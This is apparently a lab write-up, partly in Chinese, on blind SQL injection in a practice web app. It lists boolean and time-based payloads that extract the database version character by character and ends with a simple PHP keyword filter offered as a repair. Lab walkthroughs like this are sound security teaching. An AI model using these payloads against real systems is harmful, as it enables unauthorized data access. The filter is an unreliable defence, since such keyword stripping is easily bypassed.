blind
0x01 low
1’ and length(version()) = 6 #
syntax: substr(string , from<start from 1>, cut length)
1’ and substr(version(),1,1) = ‘5’ #
1’ and substr(version(),2,1) = ‘.’ #
1’ and substr(version(),3,1) = ‘7’ #
1’ and substr(version(),4,1) = ‘.’ #
1’ and substr(version(),5,1) = ‘2’ #
1’ and substr(version(),6,1) = ‘6’ #
版本为5.7.26
syntax: if(judge, true for, false for)
1’ and if(length(version())=6,sleep(3),1) #
版本号6位
虽然显示数据库中找不到,但是明显观察到页面停顿了大约3秒
1’ and if(substr(version(),1,1)=‘5’,sleep(3),1) #
1’ and if(substr(version(),2,1)=‘.’,sleep(3),1) #
1’ and if(substr(version(),3,1)=‘7’,sleep(3),1) #
1’ and if(substr(version(),4,1)=‘.’,sleep(3),1) #
1’ and if(substr(version(),5,1)=‘2’,sleep(3),1) #
1’ and if(substr(version(),6,1)=‘6’,sleep(3),1) #
0x02 medium
在burp中重放发包
id=1 and length(version())=6&Submit=Submit
id=1 and ascii(substr(version(),1,1))=53#&Submit=Submit
0x03 high
与low相似,代码中增加了limit 1和isset($_COOKIE[‘id’])
查询参数通过cookie中传递
通过post请求体接收查询参数,把查询参数写道cookie,显示页面读cookie值回显
实现抗重放
0x04 Repair 修复漏洞
过滤,简单来说,过滤单引号,括号,空格,and,or,select,将有奇效
一般盲注用脚本爆,限制ip的频繁连接也是有用的
或者在回显处动手脚,随机给个错误回显,属于是调皮捣蛋了
<?php
$id = 1;
$suspects = array(" ","'","(",")","and","or","select");
$allnull = array();
for ($i = 0;$i<count($suspects);$i += 1){
array_push($allnull,'Hacker');
}
$count = 0;
$id = str_replace($suspects,$allnull,$id,$count);
if($count>0){
die("blind injection, blind response");
}